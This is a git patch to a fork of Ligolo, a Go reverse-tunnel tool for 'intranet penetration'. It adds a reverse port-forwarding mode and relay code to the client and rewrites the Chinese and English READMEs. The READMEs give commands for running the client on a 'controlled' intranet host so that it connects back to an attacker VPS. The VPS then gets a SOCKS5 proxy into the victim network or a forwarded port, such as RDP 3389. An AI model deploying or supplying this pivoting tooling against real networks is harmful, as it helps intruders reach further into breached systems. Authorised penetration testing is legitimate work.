From 620d528233428bd340e6bd279ae63480a4c5899f Mon Sep 17 00:00:00 2001 From: FunnyWolf Date: Thu, 10 Mar 2022 20:12:22 +0800 Subject: [PATCH] add reverse portfwd function --- Makefile | 2 +- README.md | 117 +++++++++++++++++++++++---------------- README_EN.md | 132 ++++++++++++++++++++++++++++++++++++++++++++ README_ZH.md | 118 --------------------------------------- cmd/ligoloc/main.go | 39 +++++++++++-- cmd/ligolos/main.go | 2 +- 6 files changed, 239 insertions(+), 171 deletions(-) create mode 100644 README_EN.md delete mode 100644 README_ZH.md diff --git a/Makefile b/Makefile index a27f4da..7d9610a 100644 --- a/Makefile +++ b/Makefile @@ -9,7 +9,7 @@ CLIENT_BINARY=ligoloc SERVER_BINARY=ligolos TAGS=release -OSARCH = "linux/amd64 linux/386 windows/amd64 windows/386 darwin/amd64 darwin/386" +OSARCH = "linux/amd64 linux/386 windows/amd64 windows/386 darwin/amd64" TLS_HOST ?= 'ligolo.lan' diff --git a/README.md b/README.md index 0a2dd29..ae6e988 100644 --- a/README.md +++ b/README.md @@ -1,115 +1,138 @@ -# Ligolo: Reverse tunnel for intranet penetration +# Ligolo : 用于内网渗透的反向隧道 [![forthebadge](https://forthebadge.com/images/badges/made-with-go.svg)](https://forthebadge.com) [![forthebadge](https://forthebadge.com/images/badges/gluten-free.svg)](https://forthebadge.com) -English | [简体中文](./README_ZH.md) +简体中文 | [English](./README_EN.md) -## introduce +## 介绍 -The project is modified according to [ligolo](https://github.com/sysdream/ligolo), mainly for some functional tailoring, which is convenient to use. +项目根据 [ligolo](https://github.com/sysdream/ligolo) 修改,主要做一些功能上的裁剪,方便使用. -**Ligolo** is a simple, lightweight reverse Socks5 proxy tool, all traffic is encrypted with TLS. +**Ligolo** 是一个简单的,轻量级的反向Socks5代理工具及端口映射工具,所有的流量使用TLS加密. -Its function is similar to *Autoroute + Socks4a* in *Meterpreter*, but it is more stable and faster. +其功能类似于*Meterpreter*中的*Autoroute + Socks4a*,但是更加稳定,速度更快. -## why you need this +## 使用场景 -When you have obtained the permission of a Windows / Linux / Mac host on the other party's intranet and the host can connect to the Internet. +当你已经在对方内网获取到一台 Windows / Linux / Mac 主机的权限且该主机可以连接互联网. -At this point you want to establish a Socks5 proxy for the other party's intranet. +此时你想要建立一个对方内网的Socks5代理或需要连接内网某个IP地址的某端口. -**Ligolo** can help you establish an agent to help you continue to penetrate the intranet. +**Ligolo** 可以帮助你建立代理,协助你继续进行内网渗透. -> If the controlled host cannot access the Internet, you can try another tool [pystinger](https://github.com/FunnyWolf/pystinger) +> 如果已控主机不能访问互联网,可以尝试使用另一款工具 [pystinger](https://github.com/FunnyWolf/pystinger) -## Instructions +## 使用方法 -### TL;DR +### Sock5代理 -- Get the compiled binary file [release](https://github.com/FunnyWolf/ligolo/releases) +- 获取已编译的二进制文件 [release](https://github.com/FunnyWolf/ligolo/releases) -- In your VPS hosting. +- 在你的VPS主机中. ``` ./ligolos ``` -- In the controlled intranet host. +- 在已控制的内网主机中. ``` > ligoloc.exe -s your-vps-ip:443 ``` -- After the connection is successfully established, the 127.0.0.1:1080 of the VPS has established the Socks5 proxy for the internal network of the controlled host. +- 连接建立成功后,此时VPS的127.0.0.1:1080已经建立已控主机的内网Socks5代理. -### Detailed description +### 详细说明 -*Ligolo* contains two modules: +*Ligolo* 包含两个模块: - ligolos (server) - ligoloc (client) -*ligolos* runs on your VPS server (attack server). +*ligolos* 运行于你的VPS服务器 (攻击服务器). -*ligoloc* runs on an already controlled intranet host. +*ligoloc* 运行于已经控制的内网主机. -*ligolos* can use the default settings. It will listen on port 0.0.0.0:443 (for waiting for ligoloc connection) and 127.0.0.1:1080 (for socks5 proxy). +*ligolos*可以使用默认设置.它会监听0.0.0.0:443端口(用于等待ligoloc连接)及127.0.0.1:1080(用于socks5代理). -*ligoloc* The server address must be specified when running, using the parameter `-s your-vps-ip:443`. +*ligoloc*运行时必须制定服务端地址,使用参数`-s your-vps-ip:443`. -You can use the `-h` parameter to view the help. +你可以使用`-h`参数查看帮助. -Once the connection between *ligolos* and *ligoloc* is established, you can use the intranet socks5 proxy of the VPS server `127.0.0.1:1080`. +一旦*ligolos* 和 *ligoloc* 之间的连接建立成功,你即可使用VPS服务器`127.0.0.1:1080`的内网socks5代理. -### Options + +### 反向端口映射 +- 在你的VPS主机中. + +``` +./ligolos -p 0.0.0.0:13389 +``` + +- 在已控制的内网主机中. + +``` +> ligoloc.exe -s your-vps-ip:443 -t 127.0.0.1:3389 +``` + +- 连接建立成功后,已经将以控制内网主机的3389映射到VPS-IP:13389. + + + +### 选项 *ligolos* options: ``` -PS XXX\bin> .\ligolos_windows_amd64.exe -h -Usage of D:\Code\git\go\src\ligolo\bin\ligolos_windows_amd64.exe: +PS D:\xxx\bin> .\ligolos.exe -h +Usage of D:\xxx\ligolos.exe: -cert string The TLS server certificate,Unnecessary (default "cert.pem") -key string The TLS server key,Unnecessary (default "key.pem") -l string The relay server listening address (the connect-back address) (default "0.0.0.0:443") - -s5 string - The local socks5 server address (your proxychains parameter) (default "127.0.0.1:1080") + -p string + The local socks5 server address or ip:port use to connect target (default "127.0.0.1:1080") ``` *ligoloc* options: ``` -PS XXX\bin> .\ligoloc_windows_amd64.exe -h -Usage of D:\Code\git\go\src\ligolo\bin\ligoloc_windows_amd64.exe: +Usage of D:\XXX\ligoloc.exe: + -proxy string + Use proxy to connect ligolo server(e.g. http://user:passwd@192.168.1.128:8080 socks5://user:passwd@192.168.1.128:1080) -s string - The relay server (the connect-back address) (default "example.com:443") + The ligolo server (the connect-back address)(e.g. 0.0.0.0:443) + -t string + The destination server (a 192.168.1.3:3389, 192.168.1.3:22, etc.) - when not specified, Ligolo starts a socks5 proxy server ``` -### Compile +### 编译 -Refer to the compilation method of the original ligolo +参考原版ligolo的编译方法 -## Features +## 特性 -- TLS 1.3 encrypted tunnel -- Multi-platform (Windows / Linux / Mac /...) -- Multiple connection multiplexing (1 TCP connection transmits all traffic) -- SOCKS5 proxy +- TLS 1.3 加密隧道 +- 多平台 (Windows / Linux / Mac / ...) +- 多连接复用 (1 TCP连接传输所有流量) +- SOCKS5代理 ## To Do -- Better timeout mechanism -- SOCKS5 UDP support -- mTLS mutual authentication -- Reverse port mapping (mapping intranet port to internet) +- 更好的超时机制 +- SOCKS5 UDP 支持 +- mTLS双向认证 ## Licensing -GNU General Public License v3.0 (refer to LICENSING). +GNU General Public License v3.0 (参考 LICENSING). + +## 原版作者 + +* Nicolas Chatelain + -## Original author -* Nicolas Chatelain \ No newline at end of file diff --git a/README_EN.md b/README_EN.md new file mode 100644 index 0000000..73e80ec --- /dev/null +++ b/README_EN.md @@ -0,0 +1,132 @@ +# Ligolo: Reverse tunnel for intranet penetration + +[![forthebadge](https://forthebadge.com/images/badges/made-with-go.svg)](https://forthebadge.com) +[![forthebadge](https://forthebadge.com/images/badges/gluten-free.svg)](https://forthebadge.com) + +English | [简体中文](./README.md) + +## introduce + +The project is modified according to [ligolo](https://github.com/sysdream/ligolo), mainly for some functional tailoring, which is convenient to use. + +**Ligolo** is a simple, lightweight reverse Socks5 proxy tool, all traffic is encrypted with TLS. + +Its function is similar to *Autoroute + Socks4a* in *Meterpreter*, but it is more stable and faster. + +## why you need this + +When you have obtained the permission of a Windows / Linux / Mac host on the other party's intranet and the host can connect to the Internet. + +At this point you want to establish a Socks5 proxy for the other party's intranet. + +**Ligolo** can help you establish an agent to help you continue to penetrate the intranet. + +> If the controlled host cannot access the Internet, you can try another tool [pystinger](https://github.com/FunnyWolf/pystinger) + +## Instructions + +### TL;DR + +- Get the compiled binary file [release](https://github.com/FunnyWolf/ligolo/releases) + +- In your VPS hosting. + +``` +./ligolos +``` + +- In the controlled intranet host. + +``` +> ligoloc.exe -s your-vps-ip:443 +``` + +- After the connection is successfully established, the 127.0.0.1:1080 of the VPS has established the Socks5 proxy for the internal network of the controlled host. + +### Detailed description + +*Ligolo* contains two modules: + +- ligolos (server) +- ligoloc (client) + +*ligolos* runs on your VPS server (attack server). + +*ligoloc* runs on an already controlled intranet host. + +*ligolos* can use the default settings. It will listen on port 0.0.0.0:443 (for waiting for ligoloc connection) and 127.0.0.1:1080 (for socks5 proxy). + +*ligoloc* The server address must be specified when running, using the parameter `-s your-vps-ip:443`. + +You can use the `-h` parameter to view the help. + +Once the connection between *ligolos* and *ligoloc* is established, you can use the intranet socks5 proxy of the VPS server `127.0.0.1:1080`. + + +### Reverse portfwd +- In your VPS host +``` +./ligolos -p 0.0.0.0:13389 +``` +- In controlled intranet host +``` +> ligoloc. exe -s your-vps-ip:443 -t 127.0.0.1:3389 +``` +- After the connection is established successfully, the intranet host 127.0.0.1:3389 has been mapped to vps-ip:13389 + + +### Options + +*ligolos* options: + +``` +PS D:\xxx\bin> .\ligolos.exe -h +Usage of D:\xxx\ligolos.exe: + -cert string + The TLS server certificate,Unnecessary (default "cert.pem") + -key string + The TLS server key,Unnecessary (default "key.pem") + -l string + The relay server listening address (the connect-back address) (default "0.0.0.0:443") + -p string + The local socks5 server address or ip:port use to connect target (default "127.0.0.1:1080") +``` + +*ligoloc* options: + +``` +Usage of D:\XXX\ligoloc.exe: + -proxy string + Use proxy to connect ligolo server(e.g. http://user:passwd@192.168.1.128:8080 socks5://user:passwd@192.168.1.128:1080) + -s string + The ligolo server (the connect-back address)(e.g. 0.0.0.0:443) + -t string + The destination server (a 192.168.1.3:3389, 192.168.1.3:22, etc.) - when not specified, Ligolo starts a socks5 proxy server +``` + + +### Compile + +Refer to the compilation method of the original ligolo + +## Features + +- TLS 1.3 encrypted tunnel +- Multi-platform (Windows / Linux / Mac /...) +- Multiple connection multiplexing (1 TCP connection transmits all traffic) +- SOCKS5 proxy + +## To Do + +- Better timeout mechanism +- SOCKS5 UDP support +- mTLS mutual authentication +- Reverse port mapping (mapping intranet port to internet) + +## Licensing + +GNU General Public License v3.0 (refer to LICENSING). + +## Original author + +* Nicolas Chatelain \ No newline at end of file diff --git a/README_ZH.md b/README_ZH.md deleted file mode 100644 index a6d9818..0000000 --- a/README_ZH.md +++ /dev/null @@ -1,118 +0,0 @@ -# Ligolo : 用于内网渗透的反向隧道 - -[![forthebadge](https://forthebadge.com/images/badges/made-with-go.svg)](https://forthebadge.com) -[![forthebadge](https://forthebadge.com/images/badges/gluten-free.svg)](https://forthebadge.com) - -简体中文 | [English](./README.md) - -## 介绍 - -项目根据 [ligolo](https://github.com/sysdream/ligolo) 修改,主要做一些功能上的裁剪,方便使用. - -**Ligolo** 是一个简单的,轻量级的反向Socks5代理工具,所有的流量使用TLS加密. - -其功能类似于*Meterpreter*中的*Autoroute + Socks4a*,但是更加稳定,速度更快. - -## 使用场景 - -当你已经在对方内网获取到一台 Windows / Linux / Mac 主机的权限且该主机可以连接互联网. - -此时你想要建立一个对方内网的Socks5代理. - -**Ligolo** 可以帮助你建立代理,协助你继续进行内网渗透. - -> 如果已控主机不能访问互联网,可以尝试使用另一款工具 [pystinger](https://github.com/FunnyWolf/pystinger) - -## 使用方法 - -### TL;DR - -- 获取已编译的二进制文件 [release](https://github.com/FunnyWolf/ligolo/releases) - -- 在你的VPS主机中. - -``` -./ligolos -``` - -- 在已控制的内网主机中. - -``` -> ligoloc.exe -s your-vps-ip:443 -``` - -- 连接建立成功后,此时VPS的127.0.0.1:1080已经建立已控主机的内网Socks5代理. - -### 详细说明 - -*Ligolo* 包含两个模块: - -- ligolos (server) -- ligoloc (client) - -*ligolos* 运行于你的VPS服务器 (攻击服务器). - -*ligoloc* 运行于已经控制的内网主机. - -*ligolos*可以使用默认设置.它会监听0.0.0.0:443端口(用于等待ligoloc连接)及127.0.0.1:1080(用于socks5代理). - -*ligoloc*运行时必须制定服务端地址,使用参数`-s your-vps-ip:443`. - -你可以使用`-h`参数查看帮助. - -一旦*ligolos* 和 *ligoloc* 之间的连接建立成功,你即可使用VPS服务器`127.0.0.1:1080`的内网socks5代理. - -### 选项 - -*ligolos* options: - -``` -PS XXX\bin> .\ligolos_windows_amd64.exe -h -Usage of D:\Code\git\go\src\ligolo\bin\ligolos_windows_amd64.exe: - -cert string - The TLS server certificate,Unnecessary (default "cert.pem") - -key string - The TLS server key,Unnecessary (default "key.pem") - -l string - The relay server listening address (the connect-back address) (default "0.0.0.0:443") - -s5 string - The local socks5 server address (your proxychains parameter) (default "127.0.0.1:1080") -``` - -*ligoloc* options: - -``` -PS XXX\bin> .\ligoloc_windows_amd64.exe -h -Usage of D:\Code\git\go\src\ligolo\bin\ligoloc_windows_amd64.exe: - -s string - The relay server (the connect-back address) (default "example.com:443") -``` - -### 编译 - -参考原版ligolo的编译方法 - -## 特性 - -- TLS 1.3 加密隧道 -- 多平台 (Windows / Linux / Mac / ...) -- 多连接复用 (1 TCP连接传输所有流量) -- SOCKS5代理 - -## To Do - -- 更好的超时机制 -- SOCKS5 UDP 支持 -- mTLS双向认证 -- 反向端口映射 (映射内网端口到互联网) - -## Licensing - -GNU General Public License v3.0 (参考 LICENSING). - -## 原版作者 - -* Nicolas Chatelain - - - diff --git a/cmd/ligoloc/main.go b/cmd/ligoloc/main.go index 34ca7ad..9b589f7 100644 --- a/cmd/ligoloc/main.go +++ b/cmd/ligoloc/main.go @@ -9,6 +9,7 @@ import ( "github.com/armon/go-socks5" "github.com/hashicorp/yamux" "github.com/sirupsen/logrus" + "io" "net" "net/http" "net/url" @@ -95,11 +96,12 @@ func DialTcpBySocks5Proxy(proxyHost string, dstAddr string, auth *ProxyAuth) (c } func main() { - relayServer := flag.String("s", "", "The ligolo server (the connect-back address)(e.g. example.com:443)") + relayServer := flag.String("s", "", "The ligolo server ip:port (e.g. example.com:443)") + targetServer := flag.String("t", "", "The destination server ip:port (e.g. 192.168.1.3:3389, 192.168.1.3:22, etc.) - when not specified, Ligolo starts a socks5 proxy server") proxyStr := flag.String("proxy", "", "Use proxy to connect ligolo server(e.g. http://user:passwd@192.168.1.128:8080 socks5://user:passwd@192.168.1.128:1080)") flag.Parse() for { - err := StartLigolo(*relayServer, *proxyStr) + err := StartLigolo(*relayServer, *targetServer, *proxyStr) if err != nil { logrus.Error(err) } @@ -108,7 +110,7 @@ func main() { } } -func StartLigolo(relayServer string, proxyStr string) error { +func StartLigolo(relayServer string, targetServer string, proxyStr string) error { var socks *socks5.Server logrus.Infoln("Connecting to ligolo server...") config := &tls.Config{InsecureSkipVerify: true} @@ -149,7 +151,16 @@ func StartLigolo(relayServer string, proxyStr string) error { } logrus.WithFields(logrus.Fields{"active_sessions": session.NumStreams()}).Println("Accepted new connection !") // When no targetServer are specified, starts a socks5 proxy - go socks.ServeConn(stream) + if targetServer == "" { + go socks.ServeConn(stream) + } else { + proxyConn, err := net.Dial("tcp", targetServer) + if err != nil { + logrus.Errorf("Error creating Proxy TCP connection ! Error : %s\n", err) + return err + } + go handleRelay(stream, proxyConn) + } } } @@ -163,3 +174,23 @@ func startSocksProxy() (*socks5.Server, error) { } return socks, nil } + +func handleRelay(src net.Conn, dst net.Conn) { + stop := make(chan bool, 2) + + go relay(src, dst, stop) + go relay(dst, src, stop) + + select { + case <-stop: + return + } +} + +func relay(src net.Conn, dst net.Conn, stop chan bool) { + io.Copy(dst, src) + dst.Close() + src.Close() + stop <- true + return +} diff --git a/cmd/ligolos/main.go b/cmd/ligolos/main.go index cc776e4..26d9769 100644 --- a/cmd/ligolos/main.go +++ b/cmd/ligolos/main.go @@ -12,7 +12,7 @@ import ( ) func main() { - localServer := flag.String("s5", "127.0.0.1:1080", "The local socks5 server address (your proxychains parameter)") + localServer := flag.String("p", "127.0.0.1:1080", "The local socks5 server address or ip:port to connect") relayServer := flag.String("l", "0.0.0.0:443", "The relay server listening address (the connect-back address)") certFile := flag.String("cert", "cert.pem", "The TLS server certificate,Unnecessary") keyFile := flag.String("key", "key.pem", "The TLS server key,Unnecessary")